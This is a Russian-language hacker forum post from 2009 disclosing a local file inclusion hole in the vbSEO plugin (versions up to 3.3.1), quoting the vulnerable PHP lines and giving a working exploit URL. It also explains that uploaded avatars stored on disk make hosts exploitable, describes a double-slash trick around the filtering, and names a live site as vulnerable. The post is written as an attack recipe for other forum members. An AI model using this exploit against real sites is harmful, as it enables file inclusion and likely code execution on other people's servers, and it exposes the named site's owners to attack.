
10.11.2009, 18:08
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
vbSEO <= 3.3.1 LFI
Продукт: vbSEO <= 3.3.1 (возможно и более позние версии, если таковые имеются)
Офф сайт: vbseo.com
Опасность: 9\10
Уязвимый файл: vbseo.php
Уязвимый кусок кода:
Код:
16: if (isset($_GET['vbseourl'])) $vbseo_url_ = $_GET['vbseourl'];
....
55: define('VBSEO_BASEURL', basename($vbseo_url_));
....
819: if (!$vbseo_found) {
820: $vbseo_found_fn = VBSEO_BASEURL;
....
864: if ($_GET['vbseoembedd'] && $vbseo_found_fn) {
865: ob_start("vbseo_output_handler");
866: require ($vbseo_found_fn);
867: ob_flush();
868: if (!defined('VBSEO_PROCESS')) {
869: $output = ob_get_contents();
870: ob_clean();
871: $output = make_crawlable($output);
872: echo $output;
873: }
874: exit();
875: }
Сплоент:
1. Если аватарки заливаются не в БД, то хост уязвим
2. vbseo.php?vbseoembedd=1&vbseourl=images//index.html
* юзаем двойные слеши
** из за гребанной функции basename на директорию ниже не спуститься, собственно и RFI обламывается из за этого же (
*** поправочка, конкретно не из за basename, там еще корявенькая фильтрация присутствует
Пример дырявого сайта я выкладывал - tgbr.in
Дорк оставлю при себе, один хрен на разных сайтах копирайты почему то разные или вообще отсутствуют.
Последний раз редактировалось BlackSun; 10.11.2009 в 18:58..
|
|
|